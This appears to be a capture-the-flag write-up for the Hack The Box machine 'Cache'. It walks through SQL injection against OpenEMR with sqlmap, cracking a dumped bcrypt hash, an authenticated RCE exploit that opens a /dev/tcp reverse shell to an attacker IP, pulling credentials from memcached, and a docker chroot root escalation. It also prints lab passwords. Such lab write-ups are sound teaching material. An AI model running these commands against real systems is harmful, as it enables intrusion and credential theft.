Cache - [HTB]

Cover Image for Cache - [HTB]
Marmeus
Marmeus

Table of Contents

    Introduction

    Cache is a medium level Hack The Box Machine, in which you have to "hack" into a hacker's website, that lately will become a medical login portal in order to get a user. Then, you will have to enumerate several local services to find a special credentials, which allow you to become root through docker containers.

    Enumeration

    As always I start scanning all open ports so I know every single service running.

    kali@kali:$ sudo nmap -sS -T5 -n -p- -oN AllPorts.txt 10.10.10.188
    Warning: 10.10.10.188 giving up on port because retransmission cap hit (2).
    Nmap scan report for 10.10.10.188
    Host is up (0.039s latency).
    Not shown: 65533 closed ports
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    
    # Nmap done at Fri Oct  2 11:05:44 2020 -- 1 IP address (1 host up) scanned in 64.95 seconds

    Then, I execute a more in depth scan against all services that were found in the previous scan.

    kali@kali:$ sudo nmap -sC -sV -n -p22,80 -oN PorsDepth.txt 10.10.10.188
    Nmap scan report for 10.10.10.188
    Host is up (0.038s latency).
    
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
    |   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
    |_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Cache
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Fri Oct  2 11:06:27 2020 -- 1 IP address (1 host up) scanned in 10.65 seconds
    
    

    Because there is only two services and one of them is SSH, which never has vulnerabilities associate to it, I don't have any no option but start analyzing the HTTP service.

    Web

    image-1

    At first view I don't see anything interesting, so I used gobuster to find any hidden folder.

    kali@Kali:$ gobuster -t 20 dir -u http://10.10.10.188/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o directories.txt
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://10.10.10.188/
    [+] Threads:        20
    [+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/10/06 16:44:22 Starting gobuster
    ===============================================================
    /javascript (Status: 301)
    /jquery (Status: 301)
    /server-status (Status: 403)
    ===============================================================
    2020/10/06 16:53:26 Finished
    ===============================================================
    

    Inside the /jquery folder there is functionality.js file.

    image-2

    Looking at the code there are some hard written credentials, that can be used in the "login" section of the main web page.

    image-3

    As you can see this page is under construction and there isn't anything useful.

    image-4

    However, in the author page the "hacker" is talking about two projects: One named cache with its corresponding domain "cache.htb" and another project "HMS" (Hospital Management System).

    image-5

    Using "hms.htb" as domain, appears an openEMR login portal. (OpenEMR is an open-source electronic medical record and practice management software.)

    image-6

    Explotation

    Through this document you can see that openEMR is vulnerable to several SQLi attacks, starting with the find_appt_popup_user.php file I got this page.

    Note: In order to perform the sql injection attack you need to create an account at http://hms.htb/portal/index.php?site=default\&w

    image-20201007232509645

    I stored the HTTP request in a txt file using burp.

    image-20201007233757526

    This request can be used with sqlmap in order to do sql injections obtaining the databases.

    kali@kali:$ sqlmap -r request.txt --dbs --batch
    available databases [2]:
    [*] information_schema
    [*] openemr

    Note: The --batch is used for never ask for user input, using the default sqlmap behavior

    Then, using sqlmap we can get the tables inside the openemr database.

    kali@kali:$ sqlmap -r request.txt --threads=10 -D openemr --tables --batch 

    Finally, the user information is at the users_secure table, so using nmap we can dump it.

    kali@kali:$ sqlmap -r request.txt --threads=10 -D openemr -T users_secure --dump
    		    SALT                                        PASSWORD                                       USER
    | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | openemr_admin |

    The password can be cracked using John The Ripper (the hash.txt file looks like this "openemr_admin:$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.")

    kali@kali:$ john -w=/usr/share/wordlists/rockyou.txt hash.txt 
    Using default input encoding: UTF-8
    Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
    Cost 1 (iteration count) is 32 for all loaded hashes
    Will run 3 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    xxxxxx           (openemr_admin)
    1g 0:00:00:00 DONE (2020-10-07 18:55) 2.777g/s 2400p/s 2400c/s 2400C/s lester..felipe
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed
    

    This credentials can be used with the exploit "5.0.1 - (Authenticated) Remote Code Execution" in order to get a reverse shell.

    {Shell 1}:$ rlwrap nc -nlvp 4444
    {Shell 2}:$ python OpenEMRCE.py -u openemr_admin -p xxxxxx -c  '/bin/bash -i >& /dev/tcp/10.10.14.215/4444 0>&1' http://hms.htb

    Later on, we can use python and ash credentials to get the user.txt flag.

    www-data@cache:/var/www/hms.htb/public_html/interface$ python3 -c 'import pty;pty.spawn("/bin/bash")'
    www-data@cache:/var/www/hms.htb/public_html/interface$ su - ash 
    su - ash 
    Password: H@v3_fun
    ash@cache:~$ wc -c user.txt
    33 user.txt

    Privilege escalation 1

    Using netstat we can find a weird listening port "11211".

    ash@cache:~$ netstat -putona
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     Timer
    tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
    tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
    tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
    tcp        0    307 10.10.10.188:45080      10.10.14.215:4444       ESTABLISHED 3709/bash            on (0.24/0/0)
    tcp        0      0 127.0.0.1:11211         127.0.0.1:40990         TIME_WAIT   -                    timewait (27.64/0/0)
    tcp        0      1 10.10.10.188:53236      8.8.8.8:53              SYN_SENT    -                    on (6.90/3/0)
    tcp        0      0 10.10.10.188:44950      10.10.14.215:4444       CLOSE_WAIT  3452/bash            off (0.00/0/0)
    tcp6       0      0 :::80                   :::*                    LISTEN      -                    off (0.00/0/0)
    tcp6       0      0 :::22                   :::*                    LISTEN      -                    off (0.00/0/0)
    tcp6       1      0 10.10.10.188:80         10.10.14.215:38106      CLOSE_WAIT  -                    keepalive (6623.12/0/0)
    tcp6       0      0 10.10.10.188:80         10.10.14.215:38122      ESTABLISHED -                    keepalive (7182.57/0/0)
    udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                    off (0.00/0/0)
    udp        0      0 127.0.0.1:40122         127.0.0.53:53           ESTABLISHED -                    off (0.00/0/0)

    A quick search on San Google appears a penetration article for the service memcached. (Memcached server is used by corporations in order to increase the speed of their network as it helps to store frequently used data. This helps to take the load of the hardware and decrease the time taken.)

    Following the article steps we can get the user "luffy" with a password "0n3_p1ec3".

    telnet 127.0.0.1 11211
    stats items
    stats cachedump 1 0
    get user
    get passwd

    This credentials can be used inside the linux machine to becoming the user luffy.

    luffy@cache:~$ id
    uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)

    Privilege escalation 2

    This user can run docker containers. Hence, taking a quick view to the gtfobins web page there is a command to get an interactive shell as root of the file system. However, the "alpine" image doesn't exists in this system, so we have to use ubuntu that is the one installed already.

    luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
    # wc -c /root/root.txt
    33 /root/root.txt